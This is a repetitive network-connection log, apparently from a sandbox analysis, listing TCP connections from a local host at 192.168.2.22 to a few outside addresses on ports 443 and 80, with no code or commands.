                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49171 -> 207.241.232.154:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49164
                Source: global trafficTCP traffic: 107.172.31.21:80 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.31.21:80
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49165
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 88.99.66.38:443 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 88.99.66.38:443
